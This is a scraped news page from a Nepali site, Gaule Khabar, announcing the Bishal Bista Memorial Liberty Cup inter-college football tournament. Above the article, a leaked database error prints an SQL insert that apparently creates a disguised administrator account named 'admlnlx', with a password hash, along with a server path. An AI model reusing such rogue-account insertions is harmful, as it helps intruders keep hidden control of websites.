WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bur2PqUkBSHttK6nKxrpAS6S.rbfrx1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 16:58:10', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
भोलिदेखि बिशाल बिष्ट स्मृति लिबर्टी कप सुरु – Gaule Khabar

भोलिदेखि बिशाल बिष्ट स्मृति लिबर्टी कप सुरु

भोलिदेखि बिशाल बिष्ट स्मृति लिबर्टी कप सुरु

काठमाडौं, माघ २९ –

लिबर्टी कलेज तथा बिशाल बिष्ट स्मृति प्रतिष्ठानको आयोजनामा फागुन १ गते आइतबारदेखि काठमाडौंमा अन्तर कलेज ‘बिशाल बिष्ट स्मृति लिबर्टी कप २०१७’ फुटवल प्रतियोगिता हुने भएको छ ।

सात दिनसम्म चल्ने प्रतियोगितामा सेमिफाइनल सम्मका सम्पूर्ण खेलहरु च्यासल युवा क्लबको खेल मैदानमा र फाइनल खेल दशरथ रंगशालामा हुनेछ ।

२० वटा भन्दा बढि कलेजको सहभागिता रहने प्रतियोगिताको विजेताले ५० हजार रुपैयाँ, दोस्रो हुनेले २५ हजार रुपैयाँ र तेस्रो हुनेले १० हजार रुपैयाँ पुरस्कार पाउने लिबर्टी कलेजकी राधा भण्डारीले जानकारी दिनुभयो । खेलकुदको विकास तथा युवाहरुको आपसी सम्बन्ध विकासको पाँच बर्षदेखि प्रतियोगिता हुँदै आएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका